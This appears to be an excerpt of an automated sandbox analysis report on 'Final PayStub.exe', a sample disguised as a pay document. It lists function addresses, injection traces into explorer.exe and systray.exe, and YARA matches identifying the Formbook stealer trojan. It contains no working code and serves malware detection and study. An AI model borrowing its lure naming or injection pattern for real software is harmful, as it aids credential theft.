Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE8F0	6_2_013BE8F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144AB40	6_2_0144AB40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01446BD7	6_2_01446BD7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138EA80	6_2_0138EA80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139AD00	6_2_0139AD00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142CD1F	6_2_0142CD1F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A8DBF	6_2_013A8DBF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138ADE0	6_2_0138ADE0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390C00	6_2_01390C00
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380CF2	6_2_01380CF2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430CB5	6_2_01430CB5
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01404F40	6_2_01404F40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B0F30	6_2_013B0F30
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D2F28	6_2_013D2F28
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01432F30	6_2_01432F30
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139CFE0	6_2_0139CFE0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140EFA0	6_2_0140EFA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01382FC8	6_2_01382FC8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390E59	6_2_01390E59
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144EE26	6_2_0144EE26
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144EEDB	6_2_0144EEDB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2E90	6_2_013A2E90
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144CE93	6_2_0144CE93
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0145B16B	6_2_0145B16B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137F172	6_2_0137F172
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C516C	6_2_013C516C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139B1B0	6_2_0139B1B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143F0CC	6_2_0143F0CC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144F0E0	6_2_0144F0E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014470E9	6_2_014470E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144132D	6_2_0144132D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137D34C	6_2_0137D34C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D739A	6_2_013D739A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013952A0	6_2_013952A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014312ED	6_2_014312ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AB2C0	6_2_013AB2C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01447571	6_2_01447571
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142D5B0	6_2_0142D5B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01381460	6_2_01381460
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144F43F	6_2_0144F43F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144F7B0	6_2_0144F7B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D5630	6_2_013D5630
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014416CC	6_2_014416CC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01425910	6_2_01425910
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01399950	6_2_01399950
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AB950	6_2_013AB950
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FD800	6_2_013FD800
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013938E0	6_2_013938E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144FB76	6_2_0144FB76
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01405BF0	6_2_01405BF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AFB80	6_2_013AFB80
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013CDBF9	6_2_013CDBF9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01447A46	6_2_01447A46
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144FA49	6_2_0144FA49
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01403A6C	6_2_01403A6C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143DAC6	6_2_0143DAC6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013D5AA0	6_2_013D5AA0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01431AA3	6_2_01431AA3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01441D5A	6_2_01441D5A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01447D73	6_2_01447D73
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01393D40	6_2_01393D40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AFDC0	6_2_013AFDC0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01409C32	6_2_01409C32
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144FCF2	6_2_0144FCF2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144FF09	6_2_0144FF09
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01391F92	6_2_01391F92
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144FFB1	6_2_0144FFB1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01399EB0	6_2_01399EB0
Source: C:\Windows\explorer.exe	Code function: 7_2_10577036	7_2_10577036
Source: C:\Windows\explorer.exe	Code function: 7_2_1056E082	7_2_1056E082
Source: C:\Windows\explorer.exe	Code function: 7_2_10575912	7_2_10575912
Source: C:\Windows\explorer.exe	Code function: 7_2_1056FD02	7_2_1056FD02
Source: C:\Windows\explorer.exe	Code function: 7_2_1057B5CD	7_2_1057B5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_10578232	7_2_10578232
Source: C:\Windows\explorer.exe	Code function: 7_2_10572B32	7_2_10572B32
Source: C:\Windows\explorer.exe	Code function: 7_2_10572B30	7_2_10572B30
Source: C:\Windows\explorer.exe	Code function: 7_2_110A9232	7_2_110A9232
Source: C:\Windows\explorer.exe	Code function: 7_2_110A0D02	7_2_110A0D02
Source: C:\Windows\explorer.exe	Code function: 7_2_110A6912	7_2_110A6912
Source: C:\Windows\explorer.exe	Code function: 7_2_110A3B32	7_2_110A3B32
Source: C:\Windows\explorer.exe	Code function: 7_2_110A3B30	7_2_110A3B30
Source: C:\Windows\explorer.exe	Code function: 7_2_110AC5CD	7_2_110AC5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_110A8036	7_2_110A8036
Source: C:\Windows\explorer.exe	Code function: 7_2_1109F082	7_2_1109F082
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E6E4F6	13_2_04E6E4F6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E72446	13_2_04E72446
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DB1460	13_2_04DB1460
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7F43F	13_2_04E7F43F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E5D5B0	13_2_04E5D5B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E80591	13_2_04E80591
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E77571	13_2_04E77571
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC0535	13_2_04DC0535
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E716CC	13_2_04E716CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DDC6E0	13_2_04DDC6E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DBC7C0	13_2_04DBC7C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7F7B0	13_2_04E7F7B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DE4750	13_2_04DE4750
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC0770	13_2_04DC0770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7F0E0	13_2_04E7F0E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E770E9	13_2_04E770E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E6F0CC	13_2_04E6F0CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E781CC	13_2_04E781CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E801AA	13_2_04E801AA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DCB1B0	13_2_04DCB1B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E8B16B	13_2_04E8B16B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DAF172	13_2_04DAF172
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DF516C	13_2_04DF516C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DB0100	13_2_04DB0100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E5A118	13_2_04E5A118
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E612ED	13_2_04E612ED
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DDB2C0	13_2_04DDB2C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC52A0	13_2_04DC52A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E60274	13_2_04E60274
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E803E6	13_2_04E803E6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DCE3F0	13_2_04DCE3F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E0739A	13_2_04E0739A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DAD34C	13_2_04DAD34C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7A352	13_2_04E7A352
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7132D	13_2_04E7132D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7FCF2	13_2_04E7FCF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DB0CF2	13_2_04DB0CF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E60CB5	13_2_04E60CB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E39C32	13_2_04E39C32
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC0C00	13_2_04DC0C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DDFDC0	13_2_04DDFDC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DBADE0	13_2_04DBADE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DD8DBF	13_2_04DD8DBF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E77D73	13_2_04E77D73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC3D40	13_2_04DC3D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E71D5A	13_2_04E71D5A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DCAD00	13_2_04DCAD00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7EEDB	13_2_04E7EEDB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DD2E90	13_2_04DD2E90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC9EB0	13_2_04DC9EB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7CE93	13_2_04E7CE93
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC0E59	13_2_04DC0E59
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7EE26	13_2_04E7EE26
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DB2FC8	13_2_04DB2FC8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DCCFE0	13_2_04DCCFE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC1F92	13_2_04DC1F92
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7FFB1	13_2_04E7FFB1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E34F40	13_2_04E34F40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E02F28	13_2_04E02F28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7FF09	13_2_04E7FF09
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DE0F30	13_2_04DE0F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DEE8F0	13_2_04DEE8F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC38E0	13_2_04DC38E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DA68B8	13_2_04DA68B8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DCA840	13_2_04DCA840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E8A9A6	13_2_04E8A9A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DC9950	13_2_04DC9950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DDB950	13_2_04DDB950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DD6962	13_2_04DD6962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E6DAC6	13_2_04E6DAC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E05AA0	13_2_04E05AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DBEA80	13_2_04DBEA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E33A6C	13_2_04E33A6C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E77A46	13_2_04E77A46
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7FA49	13_2_04E7FA49
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DFDBF9	13_2_04DFDBF9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E76BD7	13_2_04E76BD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DDFB80	13_2_04DDFB80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7FB76	13_2_04E7FB76
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04E7AB40	13_2_04E7AB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBDA07	13_2_02BBDA07
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBC3B6	13_2_02BBC3B6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBE093	13_2_02BBE093
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BA9E60	13_2_02BA9E60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BA9E5B	13_2_02BA9E5B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BA2FB0	13_2_02BA2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBE782	13_2_02BBE782
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBE7FD	13_2_02BBE7FD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBD753	13_2_02BBD753
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBDCA0	13_2_02BBDCA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBE442	13_2_02BBE442
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BA2D90	13_2_02BA2D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCA036	13_2_04BCA036
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC1082	13_2_04BC1082
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCE5CD	13_2_04BCE5CD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC8912	13_2_04BC8912
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC2D02	13_2_04BC2D02
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCB232	13_2_04BCB232
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC5B30	13_2_04BC5B30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BC5B32	13_2_04BC5B32

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: String function: 013D7E54 appears 101 times
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: String function: 0137B970 appears 250 times
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: String function: 013C5130 appears 58 times
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: String function: 013FEA12 appears 86 times
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: String function: 0140F290 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04E2EA12 appears 84 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04E07E54 appears 87 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04DF5130 appears 36 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04DAB970 appears 236 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04E3F290 appears 105 times

Source: Final PayStub.exe, 00000000.00000002.1249356991.0000000004E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000002.1231363594.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000002.1231363594.00000000027F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000002.1251585070.0000000006B10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000002.1230553754.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Final PayStub.exe
Source: Final PayStub.exe, 00000000.00000000.1217386342.0000000000320000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecbeU.exe4 vs Final PayStub.exe
Source: Final PayStub.exe, 00000006.00000002.1304776386.000000000147D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Final PayStub.exe
Source: Final PayStub.exe, 00000006.00000002.1304525293.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs Final PayStub.exe
Source: Final PayStub.exe, 00000006.00000002.1304676921.0000000001323000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs Final PayStub.exe
Source: Final PayStub.exe	Binary or memory string: OriginalFilenamecbeU.exe4 vs Final PayStub.exe

Source: Final PayStub.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
